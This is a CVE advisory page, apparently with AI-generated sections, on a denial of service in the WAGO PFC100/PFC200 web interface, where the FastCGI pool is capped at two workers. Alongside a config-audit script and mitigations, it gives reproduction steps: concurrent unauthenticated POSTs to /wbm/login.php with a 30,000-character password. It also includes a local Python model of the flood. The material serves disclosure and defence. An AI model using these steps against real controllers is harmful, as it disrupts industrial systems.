CVE-2019-5149
Description
The WBM web application on firmwares prior to 03.02.02 and 03.01.07 on the WAGO PFC100 and PFC200, respectively, runs on a lighttpd web server and makes use of the FastCGI module, which is intended to provide high performance for all Internet applications without the penalties of Web server APIs. However, the default configuration of this module appears to limit the number of concurrent php-cgi processes to two, which can be abused to cause a denial of service of the entire web server. This affects WAGO PFC200 Firmware version 03.00.39(12) and version 03.01.07(13), and WAGO PFC100 Firmware version 03.00.39(12) and version 03.02.02(14).
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
WAGO PFC100/PFC200 lighttpd FastCGI default config limits concurrent php-cgi processes to two, enabling remote DoS.
Vulnerability
The WBM web application on WAGO PFC100 (firmware prior to 03.02.02) and PFC200 (firmware prior to 03.01.07) runs on a lighttpd web server with FastCGI. The default configuration in /etc/lighttpd/mod_fastcgi.conf sets "max-procs" => 2, limiting concurrent php-cgi processes to two [1]. The tested builds named in the description are 03.00.39(12) and 03.02.02(14) for PFC100, and 03.00.39(12) and 03.01.07(13) for PFC200 [1]. Note that the description lists 03.02.02(14) and 03.01.07(13) as affected while also naming those same versions as the "prior to" boundary, so the affected range is not stated consistently; treat devices on those builds as affected until the vendor advisory says otherwise.
Exploitation
An unauthenticated attacker with network access to the web server can exhaust the two-process php-cgi pool by keeping a steady stream of well-formed HTTP requests to the .php handler in flight. Because mod_fastcgi will not spawn a third process, every further PHP request queues behind the occupied workers and times out or fails, denying service to all clients of the web server [1]. With only two workers, two requests that each take the server a long time to process (the Attack vector section below describes one such request) are enough to hold the pool; the attacker only has to submit the next pair before the previous one completes.
Impact
Successful exploitation causes a denial of service of the entire web server. The impact is limited to availability; no confidentiality or integrity compromise occurs. The CVSSv3 score is 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) [1].
Mitigation
The CVE description states that WAGO addressed the issue in firmware 03.02.02 for PFC100 and 03.01.07 for PFC200 [1], yet it also lists 03.02.02(14) and 03.01.07(13) among the affected builds, so confirm the fixed version against the vendor advisory before treating a device on one of those builds as patched, and upgrade to the latest available firmware. As a workaround, administrators can raise the "max-procs" value in /etc/lighttpd/mod_fastcgi.conf; this costs memory and CPU on the controller and only raises the number of concurrent slow requests the attacker must sustain, because the slow, unauthenticated code path behind the login endpoint is unchanged. Restricting network access to the WBM interface to management hosts limits who can launch the attack at all. The vulnerability is not listed in the CISA KEV catalog to date.
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- WAGO PFC100 Firmware: version 03.00.39(12)
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Insufficient resource pool: the FastCGI configuration limits concurrent php-cgi processes to two, allowing an attacker to exhaust all workers with slow requests."
Attack vector
An unauthenticated attacker sends POST requests to `/wbm/login.php` with a large password field (tens of thousands of characters) [ref_id=1]. Each such request ties up one of the two available php-cgi processes for approximately 50 seconds (the configured `idle-timeout`) because PHP's `crypt()` function is slow on large inputs [ref_id=1]. By sending two or more such requests concurrently, and resubmitting them as the workers free up, the attacker keeps both FastCGI worker processes busy and blocks all legitimate access to the WBM web application for as long as the flood continues [ref_id=1]. No authentication or special network position is required; the attack is launched over the network against the device's web interface [CWE-410].
Affected code
The default FastCGI configuration file `/etc/lighttpd/mod_fastcgi.conf` on the WAGO PFC100 and PFC200 devices sets `"max-procs" => 2`, limiting concurrent php-cgi processes to two [ref_id=1]. This configuration is applied to the WBM web application's PHP handling, including the login endpoint `/wbm/login.php` [ref_id=1].
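As an added example (not code from the Talos advisory or from WAGO), the check below parses a mod_fastcgi fragment for the pool size so an administrator can audit the file pulled from a device or a firmware image. The sample configuration is constructed: the `"max-procs" => 2` value and the 50-second `idle-timeout` are the figures this page reports, while the socket path, the `bin-path`, the 16-process hardened variant and the review threshold of 8 are assumptions.

```python
"""Audit a lighttpd mod_fastcgi fragment for an undersized php-cgi pool."""
import re

# Constructed sample in lighttpd's mod_fastcgi syntax. The "max-procs" => 2
# value and the 50 s idle-timeout are the figures this page reports; the socket
# path and bin-path are illustrative layout, not a copy of the device's file.
WEAK_CONF = '''
fastcgi.server = ( ".php" =>
  ( "localhost" =>
    ( "socket"       => "/tmp/php-fastcgi.socket",
      "bin-path"     => "/usr/bin/php-cgi",
      "max-procs"    => 2,
      "idle-timeout" => 50
    )
  )
)
'''

# The same fragment with a larger pool (assumed value). This only raises the
# bar: an attacker now needs 16 concurrent slow requests instead of 2.
HARDENED_CONF = re.sub(r'("max-procs"\s*=>\s*)2\b', r'\g<1>16', WEAK_CONF)

MIN_POOL = 8  # assumed review threshold; tune to the controller's memory budget

# Matches `"key" => 123` or `"key" => "string"`; nested "( ... )" values do not.
_OPTION = re.compile(r'"(?P<key>[a-z-]+)"\s*=>\s*(?P<value>\d+|"[^"]*")')


def fastcgi_options(conf_text):
    """Flatten the "key" => value pairs of a fastcgi.server block into a dict.

    Numeric values become int, quoted values str. This is enough for the flat
    handler blocks mod_fastcgi uses; it is not a full lighttpd config parser.
    """
    opts = {}
    for m in _OPTION.finditer(conf_text):
        raw = m.group("value")
        opts[m.group("key")] = int(raw) if raw.isdigit() else raw.strip('"')
    return opts


def audit(conf_text, min_pool=MIN_POOL):
    """Return a list of findings; an empty list means the pool size passes."""
    opts = fastcgi_options(conf_text)
    procs = opts.get("max-procs")
    if procs is None:
        return ["max-procs not set: mod_fastcgi's default applies; set it explicitly"]
    if procs < min_pool:
        hold = opts.get("idle-timeout", "?")
        return [f"max-procs={procs} is below {min_pool}: {procs} concurrent slow "
                f"requests block every PHP request, each worker held up to {hold} s"]
    return []


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, fastcgi_options(conf)["max-procs"], audit(conf) or "ok")
```

Run `audit(open("/etc/lighttpd/mod_fastcgi.conf").read())` on a copy of the device's file; the threshold is deliberately a parameter because the right pool size depends on how much RAM the controller can give php-cgi, and a larger pool does not remove the slow code path the finding describes.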
What the fix does
The advisory does not include a patch diff; the remediation guidance is implicit in the vendor's release of firmware versions 03.02.02 (PFC100) and 03.01.07 (PFC200) that address this issue [ref_id=1]. A fix would need to raise the `max-procs` value in `/etc/lighttpd/mod_fastcgi.conf` so that more php-cgi processes can run concurrently, or to rate-limit and bound the input size on the login endpoint so that a single slow request cannot monopolize a worker process for tens of seconds [ref_id=1]. Without one of these, an attacker can trivially exhaust all available FastCGI workers.
Preconditions
- config: The target device must be running a vulnerable firmware version (PFC200 < 03.01.07, PFC100 < 03.02.02)
- network: The WBM web application must be reachable over the network
- auth: No authentication required; the attacker sends unauthenticated POST requests
- input: The attacker sends a large password payload (tens of thousands of characters) in the POST body
Reproduction
Send a POST request to `/wbm/login.php` with a JSON body whose `password` field is a 30,000-character string, e.g. `{"username":"admin","password":"aaaa…"}` with the `a` repeated 30,000 times [ref_id=1]. Issue this request concurrently at least as many times as there are php-cgi workers (two by default) and resubmit as each one completes. Each request occupies a worker for approximately 50 seconds (the `idle-timeout`), so keeping two in flight at all times denies service to the entire WBM web application [ref_id=1].
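The following is an added example, not the Talos proof of concept and not WAGO code, that models the exhaustion offline so the mechanism can be observed without a device. A local stand-in for the WBM login endpoint (constructed, not the device's PHP) sits behind a semaphore that plays the role of the php-cgi pool, and a client floods it with the large-password POST described above before attempting a normal login. The 1.5-second hold, the 0.3-second client timeout, the 10,000-character "slow" threshold, the `hunter2` password and the loopback address are scaled-down assumptions; the `/wbm/login.php` path and the 30,000-character password come from the page. The example also goes one step beyond the text: it repeats the run with a larger pool and a matching number of attackers, which is why merely raising `max-procs` only moves the threshold.

```python
"""Offline model of the WBM FastCGI pool exhaustion (constructed, not WAGO code)."""
import json
import threading
import time
from concurrent.futures import ThreadPoolExecutor
from http.client import HTTPConnection
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Assumed, scaled-down stand-ins for the ~50 s a large-password POST reportedly
# holds a php-cgi worker and for how long a legitimate client will wait.
HOLD_SECONDS = 1.5       # a "slow" login occupies one worker this long
SLOW_THRESHOLD = 10_000  # password length above which the stand-in is slow
CLIENT_TIMEOUT = 0.3     # patience of a legitimate client


class LoginHandler(BaseHTTPRequestHandler):
    """Stand-in for /wbm/login.php behind a fixed-size FastCGI pool."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = json.loads(self.rfile.read(length) or b"{}")
        password = body.get("password", "")
        # lighttpd queues the request until one of the max-procs php-cgi
        # workers is free; the semaphore on the server plays that pool.
        with self.server.worker_pool:
            if len(password) >= SLOW_THRESHOLD:
                time.sleep(HOLD_SECONDS)  # models the slow crypt() path
        payload = b'{"result":"login rejected"}'
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(payload)))
        self.end_headers()
        self.wfile.write(payload)

    def log_message(self, *_args):  # keep the demo output quiet
        pass


class PoolServer(ThreadingHTTPServer):
    """Local HTTP server whose worker_pool semaphore has max_procs slots."""

    def __init__(self, max_procs):
        super().__init__(("127.0.0.1", 0), LoginHandler)
        self.worker_pool = threading.BoundedSemaphore(max_procs)

    def handle_error(self, request, client_address):
        pass  # a starved client hanging up mid-response is expected here


def post_login(port, password, timeout):
    """POST the login JSON; True if answered within `timeout` seconds."""
    conn = HTTPConnection("127.0.0.1", port, timeout=timeout)
    try:
        body = json.dumps({"username": "admin", "password": password})
        conn.request("POST", "/wbm/login.php", body=body,
                     headers={"Content-Type": "application/json"})
        conn.getresponse().read()
        return True
    except OSError:  # includes the socket timeout
        return False
    finally:
        conn.close()


def run_demo(max_procs, attackers=2):
    """Flood the pool with `attackers` slow logins, then try a normal login.

    Returns True if the normal login was starved (timed out) and False if it
    was served, i.e. whether the attackers exhausted the pool.
    """
    server = PoolServer(max_procs)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    port = server.server_address[1]
    slow_password = "a" * 30_000  # the large password from the advisory
    with ThreadPoolExecutor(max_workers=attackers) as pool:
        futures = [pool.submit(post_login, port, slow_password, HOLD_SECONDS * 4)
                   for _ in range(attackers)]
        time.sleep(0.5)  # let the attackers grab their workers
        starved = not post_login(port, "hunter2", CLIENT_TIMEOUT)
        for f in futures:
            f.result()
    server.shutdown()
    server.server_close()
    return starved


if __name__ == "__main__":
    print("max-procs=2, 2 attackers -> normal login starved:", run_demo(2))
    print("max-procs=8, 2 attackers -> normal login starved:", run_demo(8))
    print("max-procs=8, 8 attackers -> normal login starved:", run_demo(8, 8))
```

With a pool of two, two slow requests are enough to starve the normal login; with a pool of eight the same two attackers fail, and eight attackers succeed again. That is the whole argument for treating a larger `max-procs` as a mitigation that raises cost rather than as a fix.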
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1. https://talosintelligence.com/vulnerability_reports/TALOS-2019-0939 (MISC)
News mentions
No linked articles in our index yet.